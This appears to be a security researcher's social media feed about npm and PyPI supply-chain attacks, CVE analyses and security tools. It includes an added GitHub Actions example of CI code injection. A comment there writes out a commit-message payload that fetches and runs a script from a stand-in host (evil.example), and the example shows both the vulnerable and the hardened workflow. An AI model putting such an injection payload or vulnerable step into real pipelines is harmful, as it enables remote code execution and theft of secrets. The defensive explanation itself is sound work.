It was an interesting 72 hours tracking down the second wave of the Shai Hulud campaign. It's more sophisticated and aggressive than the first one. We published all we know about it here: securitylabs.datadoghq.com/articles/sha... #npm #shaihulud #malware
Posts by Eslam Salem
Our team tracked down a malicious campaign in NPM deploying Vidar stealer. This is the first time we have seen Vidar stealer distributed via a supply chain attack.
securitylabs.datadoghq.com/articles/mut...
#npm #malware #supplychainattack
I still haven't installed bat yet, but it looks very good. I will do it now.
I'm in love with Claude Code. The way it handles code writing and automates bash tasks is amazing and so convenient to me.
If you are an experienced developer who knows what you are doing, tasks that usually take weeks can be done in hours 🤯🤯 #claudecode #ai
Q for developers. Do you love/hate mandatory security training? And why?
#security #training #developers
🚨 The obfuscation game: MUT-9332 targets Solidity developers via malicious VS Code extensions!
Deep-dive analysis of this obfuscated campaign, including PowerShell & VBS scripts, PE malware, malicious browser extensions and even stegomalware.
Enjoy reading securitylabs.datadoghq.com/articles/mut...
A pretty interesting threat campaign has been discovered by our research team.
We will be disclosing it in a couple of hours, stay tuned 😉
#threats #malicious #security_research #datadog
Recognizing employees for a job well done is just as important as giving constructive feedback when they underperform. Balance builds growth. #Leadership #Feedback
I don't like threat actor attribution that much because in most cases it's wrong and so easy to forge. We should still cluster campaigns, but there is no "high confidence" attribution IMHO.
Nice work using AI to create a PoC by analyzing the patch diff.
platformsecurity.com/blog/CVE-202...
I have been told there will be a special announcement at 10am CET (that's 4am EDT btw) regarding this.
I will release the info I have at that time also. Thank you for the support.
Any idea what will happen to the CVE program after MITRE
x.com/0xTib3rius/s...
Picture of the tutorial room at KubeCon EU 2025
It’s the tutorial room at #kubecon where we’ll be hacking up a storm in just over 30 minutes!
Interesting to see that secret leaks in git are still one of the biggest threats in the SDLC.
github.blog/security/app...
I think it's time for me to start digging into AI and LLMs. I'm not sure where to start, any advice?
Seeing Phrack magazine brings back so many good memories. Good old days.
It's amazing how important one Phrack article from 27 years ago has been for web application security.
It covers what we now call SQL injection and SSRF (amongst other things), problems we're still trying to handle today, laid out in a couple of paragraphs.
phrack.org/issues/54/8#...
This time we analyzed the Next.js middleware bypass vulnerability (CVE-2025-29927). Also included IP/UA trying to exploit this in the wild.
securitylabs.datadoghq.com/articles/nex...
Our analysis and takeaways for IngressNightmare: several vulnerabilities in the Kubernetes Ingress NGINX Controller. Enjoy!
securitylabs.datadoghq.com/articles/ing...
I love it when some people tell me "that's your limit, this is your ceiling." This is when I feel the fire within me reignite!
Amazing presentation about supply chain security and the amazing work we do, by our leaders @techy.detectionengineering.net (Director of Research) and Andrewkrug (Manager of Advocacy): youtu.be/1b0RIi19qrw?...
Supply chain firewall in action
github.com/DataDog/supp...
We are happy to introduce our latest tool "Supply Chain Firewall" 🎉 by @ikretz.bsky.social
The tool detects & prevents installation of malicious packages in the local development environment.
Read more
securitylabs.datadoghq.com/articles/int...
And give it a try github.com/DataDog/supp...
Supply-chain attack in the ultralytics PyPI package: github.com/ultralytics/...
An attacker opened a pull request and pushed a commit with a malicious name, leading to CI code injection.
They then backdoored versions 8.3.41 and 8.3.42 with code downloading a second-stage binary from GitHub.
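As an added illustration of the CI code injection class mentioned above (this is not the ultralytics repository's workflow, whose details the post does not give), here is a hypothetical GitHub Actions job that interpolates an attacker-controlled commit message straight into a `run:` script, next to the hardened form. The workflow, job and step names and the example payload are assumptions; `github.event.head_commit.message` (push events) and `github.head_ref` (pull request events) are real Actions context fields.

```yaml
# Added example, not the ultralytics project's workflow. Names are assumed.
name: ci-injection-example
on: [push, pull_request]

jobs:
  vulnerable:
    runs-on: ubuntu-latest
    steps:
      # Actions expands ${{ ... }} as plain text BEFORE the shell parses the
      # script, so quoting inside the script does not protect you. A commit
      # message like (constructed payload, hypothetical host):
      #   fix"; curl -s http://evil.example/x | sh; echo "
      # turns the step into:
      #   echo "Building commit: fix"; curl -s http://evil.example/x | sh; echo ""
      # and the injected command runs with the job's token and secrets.
      - name: Log commit (unsafe, push event)
        run: echo "Building commit: ${{ github.event.head_commit.message }}"
      # Same flaw with a pull request head branch name.
      - name: Log branch (unsafe, pull_request event)
        run: echo "Branch: ${{ github.head_ref }}"

  hardened:
    runs-on: ubuntu-latest
    steps:
      # Put untrusted context into environment variables. The shell then sees
      # the values only as data ($MSG, $BRANCH), never as script text, so the
      # payload above is printed verbatim instead of executed.
      - name: Log commit and branch (safe)
        env:
          MSG: ${{ github.event.head_commit.message }}
          BRANCH: ${{ github.head_ref }}
        run: |
          printf 'Building commit: %s\n' "$MSG"
          printf 'Branch: %s\n' "$BRANCH"
```

The rule is simple: any `github.event.*` field that a contributor can set (commit messages, branch names, PR titles and bodies, issue text) is untrusted and must reach a shell step only through `env:`, never through an expression inside `run:`.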
Common reasoning is that SMS 2FA is bad due to the risk of SIM swapping. It’s also bad if the telecommunications networks are hostile 😬
www.forbes.com/sites/zakdof...
Awesome, Stratus Red Team v2.20.0 is now available 🎉
My Blackhat MEA arsenal presentation: "Detect Malicious Packages with Guarddog"
drive.google.com/file/d/11SAN...
Looks good, I will give it a try this weekend
We released Censeye today, an open source CLI tool that makes it dramatically easier to pivot and find related assets when threat hunting on Censys instead of manually checking for potential identifying characteristics like an SSH host key. github.com/Censys-Resea...